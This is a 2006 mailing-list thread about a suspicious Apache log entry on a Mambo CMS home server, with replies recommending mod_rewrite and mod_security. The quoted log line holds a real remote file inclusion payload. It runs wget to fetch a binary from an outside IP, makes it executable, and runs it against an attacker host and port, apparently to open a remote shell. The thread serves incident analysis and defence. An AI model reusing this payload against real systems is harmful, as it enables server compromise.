Re: Strange Apache log and mambo security - sexy executable
Just a couple of things:
Apache configured with mod_rewrite to deny blank or fake referers is a
good idea.
Do you have apache configured with mod_security? I highly recommend this
last one since you run an php based CMS and can protect from exploits not
yet discovered.
On Mon, January 23, 2006 2:32 am, Maik Holtkamp said:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Edward Shornock schrieb:
>> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
>> > Hi,
>> >
>> > yesterday morning I found a strange entry in my apache log files
>> (debian
>> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
>> > Server, just serving my Family and some good friends (normally).
>> >
>> > ---cut---
>> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
>> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
>> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
>> > HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
>> 5.1;)"
>> > ---cut---
>> >
>> > As I patched mambo against recent "register global" attack and my /tmp
>> > is mount noexec, the attack doesn't exploit anything.
>> >
>> > However, I curiously downloaded this sexy executable to have a closer
>> look.
>> >
>> > ---cut---
>> > backup:/home/qmb# ./sexy -h
>> > ./sexy <host> <port>
>> > ---cut---
>> >
>> Never run apps like this as root. Bad bad idea.
>
> There is an old saying in Germany:
>
> "Only damage will make you wise"
Funny, Don Quixote (when in a good mood) used to say, "Sancho, why
experience always comes when is not needed?"*
*I am just paraphrasing...
--
-JM. ?Estos días azules y este sol de la infancia ?(Antonio Machado-1939)
Reply to: